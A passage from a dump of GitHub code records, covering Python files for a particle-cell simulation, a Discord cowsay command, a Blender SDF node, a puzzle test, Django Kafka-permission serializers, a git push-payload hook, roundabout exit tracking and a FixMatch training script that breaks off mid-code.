collections import defaultdict\nimport sys\nimport itertools\n\nclass Cell:\n def __init__(self,idx,x1,y1,x2,y2,l):\n self.id = idx\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n self.boundary = {\"TOP\":None,\"LEFT\":None,\"RIGHT\":None,\"BOTTOM\":None,\"TOPRIGHT\":None,\"TOPLEFT\":None,\"BOTTOMRIGHT\":None,\"BOTTOMLEFT\":None}\n self.particleList = defaultdict()\n self.count = 0\n self.l = l\n self.already_interacted = False\n\n def add_particle(self,A):\n self.particleList[A.id] = A\n self.count +=1\n\n def remove_particle(self,A):\n self.particleList.pop(A.id, None)\n self.count -= 1\n\n def check_if_present(self,A):\n if self.x1 >=A.x and A.x<=self.x2:\n if self.y1 >=A.y and A.y<=self.y2:\n return True\n return False\n\n def status(self):\n sys.stdout.write(\"\\n ({},{}) to ({},{}) and has {} particles. \".format(self.x1,self.y1,self.x2,self.y2,self.count))\n\n\n def getAdjacentParticles(self):\n adjacentParticleList = list(self.particleList.values())\n for x in self.boundary:\n if self.boundary[x] != None:\n # if self.boundary[x].already_interacted == False:\n # print(\"Getting values from \" + x)\n adjacentParticleList = adjacentParticleList+ list(self.boundary[x].particleList.values())\n return adjacentParticleList\n","repo_name":"ashwinroot/Dynamic-Morphology-Honeybees","sub_path":"LJ/application/Modules/Cell.py","file_name":"Cell.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17877289373","text":"from discord.ext.commands import Bot, Command, Context, command\nimport subprocess\n\n\ndef runUnixCmd(*args):\n res = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', env={})\n return res.stdout\n\n\nclass Cowsay:\n def __init__(self):\n # runUnixCmd(*'cowsay 💕💕💕 à¶ž'.split())\n self.brief = runUnixCmd(*'cowsay -h'.split()).replace('cowsay', '%s')\n self.charList = '\\n'.join(runUnixCmd(*'cowsay -l'.split()).split('\\n')[1:]).split()\n\n async def cowcom(self, ctx: Context, *args: str, cowcommand='cowsay'):\n if cowcommand not in 'cowsay cowthink'.split():\n return\n param0s = 'bdgpstwyhl'\n param1s = 'efTW'\n foundParams = {}\n i, l = 0, len(args)\n while i<l:\n a = args[i]\n if a.startswith('-'):\n p0s = ''.join([si for si in a[1:] if si in param0s])\n p1s = ''.join([si for si in a[1:] if si in param1s])\n if p0s:\n if p1s:\n return\n else:\n for si in p0s: foundParams[si] = ()\n i += 1\n elif len(p1s) == 1:\n foundParams[p1s] = args[i+1]\n i += 2\n else:\n return\n else:\n foundParams['args'] = ' '.join(args[i:])\n break\n\n if 'f' in foundParams:\n foundParams['f'] = foundParams['f'].lower()\n if foundParams['f'] not in self.charList:\n return\n\n foundParams.setdefault('args', ' ')\n if 'l' in foundParams:\n await ctx.send(f'Alternative cows you can select in combination with `-f`:\\n```{\", \".join(self.charList)}```')\n elif 'h' in foundParams:\n await ctx.send(f'```{self.brief}```' % cowcommand)\n else:\n unixArgs = [cowcommand]\n p0s = [p for p in param0s if p in foundParams]\n if p0s:\n unixArgs.append('-' + ''.join(p0s))\n p1s = [p for p in param1s if p in foundParams]\n for p in p1s:\n unixArgs += ['-'+p, foundParams[p]]\n unixArgs.append(foundParams['args'])\n await ctx.send(f'```{runUnixCmd(*unixArgs)}```')\n\n def addCommandsToBot(self, bot: Bot):\n for cmd in 'cowsay cowthink'.split():\n bot.add_command(command(\n name=cmd,\n brief=self.brief % cmd\n )(getattr(self, cmd)))\n\n\n","repo_name":"nextdorf/bot-collection","sub_path":"discord/BuggyPasta/cowsay_cmd.py","file_name":"cowsay_cmd.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13078439554","text":"import numpy as np\n\nimport bpy\nfrom bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty, FloatVectorProperty\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level, get_data_nesting_level\nfrom sverchok.utils.field.scalar import SvScalarField\nfrom sverchok_extra.dependencies import sdf\nfrom sverchok_extra.utils.sdf import *\n\nclass SvExSdfSliceNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: SDF Slice\n Tooltip: SDF Slice\n \"\"\"\n bl_idname = 'SvExSdfSliceNode'\n bl_label = 'SDF Slice'\n bl_icon = 'OUTLINER_OB_EMPTY'\n sv_icon = 'SV_SLICE_SOLID'\n sv_dependencies = {'sdf'}\n\n z_value : FloatProperty(\n name = \"Z Value\",\n default = 0.0,\n update = updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvScalarFieldSocket', \"SDF\")\n self.inputs.new('SvStringsSocket', \"ZValue\").prop_name = 'z_value'\n self.outputs.new('SvScalarFieldSocket', \"SDF\")\n\n def process(self):\n if not any(socket.is_linked for socket in self.outputs):\n return\n\n sdf_s = self.inputs['SDF'].sv_get()\n z_value_s = self.inputs['ZValue'].sv_get()\n\n input_level = get_data_nesting_level(sdf_s, data_types=(SvScalarField,))\n flat_output = input_level == 1\n sdf_s = ensure_nesting_level(sdf_s, 2, data_types=(SvScalarField,))\n z_value_s = ensure_nesting_level(z_value_s, 2)\n\n sdf_out = []\n for params in zip_long_repeat(sdf_s, z_value_s):\n new_sdf = []\n for sdf, z_value in zip_long_repeat(*params):\n sdf = scalar_field_to_sdf(sdf, 0)\n sdf_2d = sdf.translate((0, 0, -z_value)).slice()\n field = SvExSdf2DScalarField(sdf_2d)\n new_sdf.append(field)\n if flat_output:\n sdf_out.extend(new_sdf)\n else:\n sdf_out.append(new_sdf)\n\n self.outputs['SDF'].sv_set(sdf_out)\n\n\ndef register():\n bpy.utils.register_class(SvExSdfSliceNode)\n\n\ndef unregister():\n bpy.utils.unregister_class(SvExSdfSliceNode)\n","repo_name":"portnov/sverchok-extra","sub_path":"nodes/sdf/sdf_slice.py","file_name":"sdf_slice.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"50"} +{"seq_id":"4941407522","text":"import unittest\n\nfrom common import read_lines\nfrom day13.transparent_origami import visible_dots_after_first_fold, fold_all\n\n\nclass TransparentOrigamiTest(unittest.TestCase):\n test_input = [\n \"6,10\",\n \"0,14\",\n \"9,10\",\n \"0,3\",\n \"10,4\",\n \"4,11\",\n \"6,0\",\n \"6,12\",\n \"4,1\",\n \"0,13\",\n \"10,12\",\n \"3,4\",\n \"3,0\",\n \"8,4\",\n \"1,10\",\n \"2,14\",\n \"8,10\",\n \"9,0\",\n \"\",\n \"fold along y=7\",\n \"fold along x=5\"]\n input = read_lines(\"day13\")\n\n def test_part_1_example(self):\n self.assertEqual(visible_dots_after_first_fold(self.test_input), 17)\n\n def test_part_1_solution(self):\n self.assertEqual(visible_dots_after_first_fold(self.input), 847)\n\n def test_part_2_example(self):\n print(\"Day 13 Part 2 Test:\")\n print(fold_all(self.test_input))\n\n def test_part_2_solution(self):\n print(\"Day 13 Part 2 Solution:\")\n print(fold_all(self.input))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mgellert/advent-of-code-2021-python","sub_path":"day13/transparent_origami_test.py","file_name":"transparent_origami_test.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10820133440","text":"from django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom ..models import *\n\nimport traceback\n\nclass ReadableEnumField(serializers.Field):\n def __init__(self, enum_cls, *args, **kwargs):\n self.enum = enum_cls\n return super(ReadableEnumField, self).__init__(*args, **kwargs)\n\n def to_representation(self, value):\n return value.name\n\n def to_internal_value(self, value):\n\t\t# handle string values for enum member names\n if value in self.enum.__members__:\n return self.enum.__members__[value]\n # handle raw values (usually ints)\n if value in self.enum:\n return self.enum(value)\n raise serializers.ValidationError(f\"Invalid membership status value {value}\")\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = [\"pk\", \"username\", \"email\"]\n read_only_fields = [\"pk\", \"username\", \"email\"]\n\nclass SCRAMCredentialsSerializer(serializers.ModelSerializer):\n class Meta:\n model = SCRAMCredentials\n fields = [\"pk\", \"owner\", \"username\", \"created_at\", \"suspended\", \"description\"]\n read_only_fields = [\"pk\", \"owner\", \"username\", \"created_at\"]\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = [\"pk\", \"name\", \"description\"]\n read_only_fields = [\"pk\", \"name\"]\n\t\t\nclass GroupMembershipSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupMembership\n fields = [\"pk\", \"user\", \"group\", \"status\"]\n read_only_fields = [\"pk\", \"user\", \"group\"]\n status = ReadableEnumField(MembershipStatus)\n\nclass GroupMembershipCreationSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupMembership\n fields = [\"user\", \"group\", \"status\"]\n status = ReadableEnumField(MembershipStatus)\n\nclass KafkaTopicSerializer(serializers.ModelSerializer):\n class Meta:\n model = KafkaTopic\n fields = [\"pk\", \"owning_group\", \"name\", \"publicly_readable\", \"description\", \"archivable\",\n \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n read_only_fields = [\"pk\", \"owning_group\", \"name\",\n \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n\n def validate_publicly_readable(self, value):\n if value is not True:\n raise serializers.ValidationError(\"Public topics may not be made private\")\n\nclass KafkaTopicAdminSerializer(serializers.ModelSerializer):\n class Meta:\n model = KafkaTopic\n fields = [\"pk\", \"owning_group\", \"name\", \"publicly_readable\", \"description\", \"archivable\",\n \"n_partitions\", \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n read_only_fields = [\"pk\", \"owning_group\", \"name\"]\n\nclass KafkaTopicCreationSerializer(serializers.ModelSerializer):\n class Meta:\n model = KafkaTopic\n fields = [\"owning_group\", \"name\", \"publicly_readable\", \"description\"]\n\n def validate(self, data):\n data = super().validate(data)\n \n name = data[\"name\"]\n group = data[\"owning_group\"]\n \n if not validate_topic_name(name):\n raise serializers.ValidationError(\"Invalid topic name\")\n\n name = group.name + '.' + name\n \n if KafkaTopic.objects.filter(name=name).exists():\n raise serializers.ValidationError(\"Topic name already in use\")\n \n data[\"name\"] = name\n \n return data\n\nclass GroupKafkaPermissionSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupKafkaPermission\n fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n read_only_fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n\nclass GroupKafkaPermissionCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupKafkaPermission\n fields = [\"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n\t\t\nclass CredentialKafkaPermissionSerializer(serializers.ModelSerializer):\n class Meta:\n model = CredentialKafkaPermission\n fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n read_only_fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n \nclass CredentialKafkaPermissionCreationSerializer(serializers.ModelSerializer):\n class Meta:\n model = CredentialKafkaPermission\n fields = [\"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n","repo_name":"scimma/scimma-admin","sub_path":"scimma_admin/hopskotch_auth/serializers/v0.py","file_name":"v0.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70628351517","text":"#!/usr/bin/python\n\nimport json\nimport sys\nfrom pygit2 import Repository, Oid, GIT_SORT_TOPOLOGICAL\n\nnil=\"0000000000000000000000000000000000000000\"\n\npayload = dict(zip(('before', 'after', 'ref'), sys.stdin.read().split()))\n\npayload['created'] = True if payload['before'] == nil else False\npayload['deleted'] = True if payload['after'] == nil else False\n\nif not payload['created'] and not payload['deleted']:\n\n repo = Repository('.')\n\n log = repo.walk(Oid(hex=payload['after']), GIT_SORT_TOPOLOGICAL)\n log.hide(Oid(hex=payload['before']))\n payload['commits'] = []\n for commit in log:\n info = {}\n info['id'] = commit.hex\n info['message'] = commit.message\n\n author = {}\n author['name'] = commit.author.name\n author['email'] = commit.author.email\n author['timestamp'] = commit.author.time\n info['author'] = author\n\n committer = {}\n committer['name'] = commit.committer.name\n committer['email'] = commit.committer.email\n committer['timestamp'] = commit.committer.time\n info['committer'] = committer\n\n payload['commits'].append(info)\n\nprint(json.dumps(payload))\n","repo_name":"sinisterstuf/web-hooker","sub_path":"web-hooker.py","file_name":"web-hooker.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31211269559","text":"from tools import consts\n\nclass ExitTracking:\n def __init__(self, topology, flow_stats):\n self.vehicles = {}\n self.training_data = {}\n self.flow_stats = flow_stats\n\n self.topology = topology\n\n def update_vehicle(self, obj, timestep):\n vehicle_id = obj[consts.TRACK_ID]\n if vehicle_id not in self.vehicles:\n self.vehicles[vehicle_id] = {'tracks': [], 'exit_point': None}\n\n if vehicle_id in self.training_data: # Vehicle already exited, skip\n return\n\n # Is vehicle exiting?\n is_exiting = self.topology.getobjectexits(obj)\n if is_exiting != -1:\n #print (\"vid {} exiting on exit {}\".format(vehicle_id, is_exiting))\n self.vehicles[vehicle_id]['exit_point'] = is_exiting\n self.generate_training_data(vehicle_id)\n\n else:\n # Add track data\n # 1. current lane id\n current_lane = self.topology.get_lane_distance(obj)\n if current_lane is None: # Not in the roundabout yet, skip\n return\n\n # 2. relative heading\n signed_relheading = self.topology.get_relative_heading(obj)\n\n # 3. straight-line distance to next exit.\n (next_exit_id, distance,\n distance_rel) = self.topology.get_distance_to_next_exit(obj)\n\n self.vehicles[vehicle_id]['tracks'].append(\n (timestep, current_lane, signed_relheading, distance, distance_rel, next_exit_id))\n\n def generate_training_data(self, vehicle_id):\n if vehicle_id not in self.vehicles or self.vehicles[vehicle_id]['exit_point'] is None:\n return\n\n if vehicle_id in self.training_data:\n print(\"Warning: object id {} has already been added to ExitTracking training data.\".format(\n vehicle_id))\n return\n\n self.training_data[vehicle_id] = []\n for track in self.vehicles[vehicle_id]['tracks']:\n\n timestep = track[0]\n flow_df = self.flow_stats[(self.flow_stats['TimeBegin'] <= timestep) & (\n self.flow_stats['TimeEnd'] > timestep)]\n if flow_df.shape[0] > 0:\n mean_approach_speed = flow_df.iloc[0]['MeanApproachSpeed']\n mean_density = flow_df.iloc[0]['MeanDensity']\n flow = flow_df.iloc[0]['Flow']\n capacity_german = flow_df.iloc[0]['Capacity_German']\n capacity_hcm2016 = flow_df.iloc[0]['Capacity_HCM2016']\n flow_capacity_german = flow_df.iloc[0]['FlowOverCapacity_German']\n flow_capacity_hcm2016 = flow_df.iloc[0]['FlowOverCapacity_HCM2016']\n\n self.training_data[vehicle_id].append(\n (track[1],\n track[2],\n track[3],\n track[4],\n mean_approach_speed,\n mean_density,\n flow,\n capacity_german,\n capacity_hcm2016,\n flow_capacity_german,\n flow_capacity_hcm2016,\n (track[5] == self.vehicles[vehicle_id]['exit_point'])))\n","repo_name":"dvxd/roundabout-risk-knowledge-analysis","sub_path":"src/tools/exit_tracking.py","file_name":"exit_tracking.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"4874571783","text":"import sys, os, copy, random, argparse, math\nimport numpy as np\nimport pandas as pd \n\nimport PIL\nimport PIL.ImageOps\nimport PIL.ImageEnhance\nimport PIL.ImageDraw\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom colorama import Fore\nfrom tqdm import tqdm\n\n\nfrom mixmatch import BasicBlock, NetworkBlock, WideResNet, accuracy, get_tqdm_config\n\n\nPARAMETER_MAX = 10\n\nmean_cifar10 = (0.4914, 0.4822, 0.4465)\nstd_cifar10 = (0.2471, 0.2345, 0.2616)\n\ndef _float_parameter(v, max_v):\n return float(v) * max_v / PARAMETER_MAX\n\n\ndef _int_parameter(v, max_v):\n return int(v * max_v / PARAMETER_MAX)\n\n# Augmentation 함수들을 정의\n\ndef AutoContrast(img, **kwargs):\n return PIL.ImageOps.autocontrast(img)\n\n\ndef Brightness(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Brightness(img).enhance(v)\n\n\ndef Color(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Color(img).enhance(v)\n\n\ndef Contrast(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Contrast(img).enhance(v)\n\n\ndef CutoutAbs(img, v, **kwargs):\n w, h = img.size\n x0, y0 = np.random.uniform(0, w), np.random.uniform(0, h)\n x0, y0 = int(max(0, x0 - v / 2.)), int(max(0, y0 - v / 2.))\n\n x1, y1 = int(min(w, x0 + v)), int(min(h, y0 + v))\n\n xy = (x0, y0, x1, y1)\n # gray\n color = (127, 127, 127)\n img = img.copy()\n \n PIL.ImageDraw.Draw(img).rectangle(xy, color)\n return img\n\n\ndef Cutout(img, v, max_v, bias=0):\n if v == 0:\n return img\n v = _float_parameter(v, max_v) + bias\n v = int(v * min(img.size))\n return CutoutAbs(img, v)\n\n\ndef Equalize(img, **kwargs):\n return PIL.ImageOps.equalize(img)\n\n\ndef Identity(img, **kwargs):\n return img\n\n\ndef Invert(img, **kwargs):\n return PIL.ImageOps.invert(img)\n\n\ndef Posterize(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n return PIL.ImageOps.posterize(img, v)\n\n\ndef Rotate(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.rotate(v)\n\n\ndef Sharpness(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Sharpness(img).enhance(v)\n\n\ndef ShearX(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, v, 0, 0, 1, 0))\n\n\ndef ShearY(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, v, 1, 0))\n\n\ndef Solarize(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n return PIL.ImageOps.solarize(img, 256 - v)\n\n\ndef SolarizeAdd(img, v, max_v, bias=0, threshold=128):\n v = _int_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n img_np = np.array(img).astype(np.int)\n img_np = img_np + v\n img_np = np.clip(img_np, 0, 255)\n img_np = img_np.astype(np.uint8)\n img = Image.fromarray(img_np)\n return PIL.ImageOps.solarize(img, threshold)\n\n\ndef TranslateX(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n v = int(v * img.size[0])\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\n\ndef TranslateY(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n v = int(v * img.size[1])\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\n# Augmentation list for RandAugment\ndef fixmatch_augment_pool():\n \n augs = [(AutoContrast, None, None),\n (Brightness, 0.9, 0.05),\n (Color, 0.9, 0.05),\n (Contrast, 0.9, 0.05),\n (Equalize, None, None),\n (Identity, None, None),\n (Posterize, 4, 4),\n (Rotate, 30, 0),\n (Sharpness, 0.9, 0.05),\n (ShearX, 0.3, 0),\n (ShearY, 0.3, 0),\n (Solarize, 256, 0),\n (TranslateX, 0.3, 0),\n (TranslateY, 0.3, 0)]\n return augs\n\n# 위에서 구현된 Augmentpool에서 랜덤으로 선정하여 실제 Augmentation을 구현\n\nclass RandAugmentMC(object):\n \n def __init__(self, n, m):\n\n assert n >= 1\n assert 1 <= m <= 10\n \n self.n = n\n self.m = m\n self.augment_pool = fixmatch_augment_pool()\n \n def __call__(self, img):\n \n ops = random.choices(self.augment_pool, k=self.n)\n \n for op, max_v, bias in ops:\n v = np.random.randint(1, self.m)\n if random.random() < 0.5:\n img = op(img, v=v, max_v=max_v, bias=bias)\n\n img = CutoutAbs(img, int(32*0.5))\n \n return img\n\n# Generate train data\nclass CIFAR10_SSL(datasets.CIFAR10):\n \n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n download=False):\n \n \n super(CIFAR10_SSL, self).__init__(\n root, train=train, transform=transform,\n target_transform=target_transform, download=download\n )\n\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n \n def __getitem__(self, index):\n \n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n \n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return img, target\n \n# Weak augmentation & Strong augmentation\n\nclass TransformFixMatch(object):\n \n def __init__(self, mean=mean_cifar10, std=std_cifar10):\n \n self.weak_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect')\n ])\n\n self.strong_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n RandAugmentMC(n=2, m=10)\n ])\n\n self.normalize = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)\n ]) \n \n \n def __call__(self, x):\n \n weak = self.weak_transform(x)\n strong = self.strong_transform(x)\n\n return self.normalize(weak), self.normalize(strong)\n \n# Labeled data와 Unlabeled data를 분리\n\ndef split_labeled_unlabeled(args, labels):\n \n label_per_class = args.n_labeled // args.n_classes\n labels = np.array(labels, dtype=int)\n indice_labeled, indice_unlabeled, indice_val = [], [], []\n\n for i in range(10):\n indice_tmp = np.where(labels==i)[0]\n\n indice_labeled.extend(indice_tmp[: label_per_class])\n indice_unlabeled.extend(indice_tmp[label_per_class: -500])\n indice_val.extend(indice_tmp[-500: ])\n \n for i in [indice_labeled, indice_unlabeled, indice_val]:\n np.random.shuffle(i)\n \n return np.array(indice_labeled), np.array(indice_unlabeled), np.array(indice_val)\n \ndef get_cifar10(args, data_dir):\n transform_labeled = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32, padding=int(32*0.125), padding_mode='reflect'),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean_cifar10, std=std_cifar10)\n ])\n\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean_cifar10, std=std_cifar10)\n ])\n\n base_dataset = datasets.CIFAR10(data_dir, train=True, download=True)\n\n indice_labeled, indice_unlabeled, indice_val = split_labeled_unlabeled(args, base_dataset.targets)\n \n labeled_dataset = CIFAR10_SSL(\n data_dir, indice_labeled, train=True,\n transform=transform_labeled\n )\n\n unlabeled_dataset = CIFAR10_SSL(\n data_dir, indice_unlabeled, train=True,\n transform=TransformFixMatch(mean=mean_cifar10, std=std_cifar10)\n )\n\n val_dataset = CIFAR10_SSL(\n data_dir, indice_val, train=True, transform=transform_val, download=False\n )\n\n test_dataset = datasets.CIFAR10(\n data_dir, train=False, transform=transform_val, download=False\n )\n \n return labeled_dataset, unlabeled_dataset, val_dataset, test_dataset\n\n# Parameter update with weightEMA\nclass WeightEMA(object): \n\n def __init__(self, model, decay):\n \n self.ema = copy.deepcopy(model)\n self.ema.eval()\n\n self.decay = decay\n\n self.ema_has_module = hasattr(self.ema, 'module')\n\n self.param_keys = [k for k, _ in self.ema.named_parameters()]\n self.buffer_keys = [k for k, _ in self.ema.named_buffers()]\n for p in self.ema.parameters():\n p.requires_grad_(False)\n\n def step(self, model):\n needs_module = hasattr(model, 'module') and not self.ema_has_module\n with torch.no_grad():\n msd = model.state_dict()\n esd = self.ema.state_dict()\n for k in self.param_keys:\n if needs_module:\n j = 'module.' + k\n else:\n j = k\n model_v = msd[j].detach()\n ema_v = esd[k]\n esd[k].copy_(ema_v * self.decay + (1. - self.decay) * model_v)\n\n for k in self.buffer_keys:\n if needs_module:\n j = 'module.' + k\n else:\n j = k\n esd[k].copy_(msd[j])\n \n# Learning rate scheduler\ndef get_cosine_schedule_with_warmup(\n optimizer, num_warmup_steps, num_training_steps,\n num_cycles=7.0/16.0, last_epoch=-1\n ):\n \n def _lr_lambda(current_step):\n if current_step < num_warmup_steps:\n return float(current_step)/float(max(1, num_warmup_steps))\n \n no_progress = float(current_step-num_warmup_steps)/\\\n (float(max(1, num_training_steps-num_warmup_steps)))\n return max(0.0, math.cos(math.pi*num_cycles*no_progress))\n \n return LambdaLR(optimizer, _lr_lambda, last_epoch)\n\n# define trainer\nclass FixMatchTrainer():\n \n def __init__(self, args):\n\n self.args = args\n \n root_dir = '/content/FixMatch' ### Project Directory\n data_dir = os.path.join(root_dir, 'data') ### Data Directory\n \n self.experiment_dir = os.path.join(root_dir, 'results') ### 학습된 모델을 저장할 큰 폴더\n os.makedirs(self.experiment_dir, exist_ok=True)\n\n name_exp = \"_\".join([str(self.args.n_labeled), str(self.args.T)]) ### 학습된 모델을 저장할 세부 폴더 (하이퍼파라미터로 지정)\n self.experiment_dir = os.path.join(self.experiment_dir, name_exp)\n os.makedirs(self.experiment_dir, exist_ok=True)\n \n print(\"==> Preparing CIFAR10 dataset\")\n labeled_set, unlabeled_set, val_set, test_set = get_cifar10(self.args, data_dir=data_dir)\n \n self.labeled_loader = DataLoader(\n labeled_set,\n sampler=RandomSampler(labeled_set), ### RandomSampler: DataLoader(shuffle=True) 와 동일한 역할\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.unlabeled_loader = DataLoader(\n unlabeled_set,\n sampler=RandomSampler(unlabeled_set),\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.val_loader = DataLoader(\n val_set,\n sampler=SequentialSampler(val_set), ### SequentialSampler: DataLoader(shuffle=False) 와 동일한 역할\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.test_loader = DataLoader(\n test_set,\n sampler=SequentialSampler(test_set),\n batch_size=self.args.batch_size,\n num_workers=0\n )\n\n print(\"==> Preparing WideResNet\")\n self.model = WideResNet(self.args.n_classes).to(self.args.cuda)\n \n self.model.zero_grad()\n self.criterion = torch.nn.CrossEntropyLoss().to(self.args.cuda)\n\n no_decay = ['bias', 'bn']\n grouped_parameters = [\n {'params': [p for n, p in self.model.named_parameters() if not any(\n nd in n for nd in no_decay)], 'weight_decay': self.args.weight_decay},\n {'params': [p for n, p in self.model.named_parameters() if any(\n nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ] \n self.optimizer = torch.optim.SGD(grouped_parameters, lr=self.args.lr,\n momentum=0.9, nesterov=self.args.nesterov)\n \n self.scheduler = get_cosine_schedule_with_warmup(self.optimizer,\n self.args.warmup,\n self.args.total_steps)\n \n if self.args.use_ema: \n self.ema_model = WeightEMA(self.model, self.args.ema_decay)\n\n self.writer = SummaryWriter(self.experiment_dir)\n\n \n def train(self, epoch):\n\n losses_t, losses_x, losses_u, mask_probs = 0.0, 0.0, 0.0, 0.0\n \n self.model.train()\n \n iter_labeled = iter(self.labeled_loader)\n iter_unlabeled = iter(self.unlabeled_loader)\n\n with tqdm(**get_tqdm_config(total=self.args.eval_step,\n leave=True, color='blue')) as pbar:\n \n for batch_idx in range(self.args.eval_step): ### eval_step: 1024 // batch_size: 64\n \n try:\n inputs_x, targets_x = iter_labeled.next()\n except:\n iter_labeled = iter(self.labeled_loader)\n inputs_x, targets_x = iter_labeled.next()\n real_B = inputs_x.size(0)\n \n try:\n (inputs_u_w, inputs_u_s), _ = iter_unlabeled.next()\n except:\n iter_unlabeled = iter(self.unlabeled_loader)\n (inputs_u_w, inputs_u_s), _ = iter_unlabeled.next()\n \n inputs = torch.cat((inputs_x, inputs_u_w, inputs_u_s), dim=0).to(self.args.cuda)\n targets_x = targets_x.type(torch.LongTensor)\n targets_x = targets_x.to(self.args.cuda)\n \n logits = self.model(inputs)\n \n logits_x = logits[:real_B]\n logits_u_w, logits_u_s = logits[real_B:].chunk(2)\n del(logits)\n\n loss_x = F.cross_entropy(logits_x, targets_x, reduction='mean')\n pseudo_labels = torch.softmax(logits_u_w.detach()/self.args.T, dim=-1) \n max_prob, targets_u = torch.max(pseudo_labels, dim=-1)\n mask = max_prob.ge(self.args.threshold).float() ##### mask: Threshold보다 크면 True, 작으면 False를 반환\n loss_u = (F.cross_entropy(logits_u_s, targets_u, reduction='none')*mask).mean()\n\n loss = loss_x + self.args.lambda_u * loss_u\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n if self.args.use_ema:\n self.ema_model.step(self.model)\n \n self.model.zero_grad()\n \n ### Tensorboard를 위해 loss값들을 기록\n losses_x += loss_x.item()\n losses_u += loss_u.item()\n losses_t += loss.item()\n mask_probs += max_prob.mean().item()\n \n ### Print log\n self.writer.add_scalars(\n 'Training steps', {\n 'Total_loss': 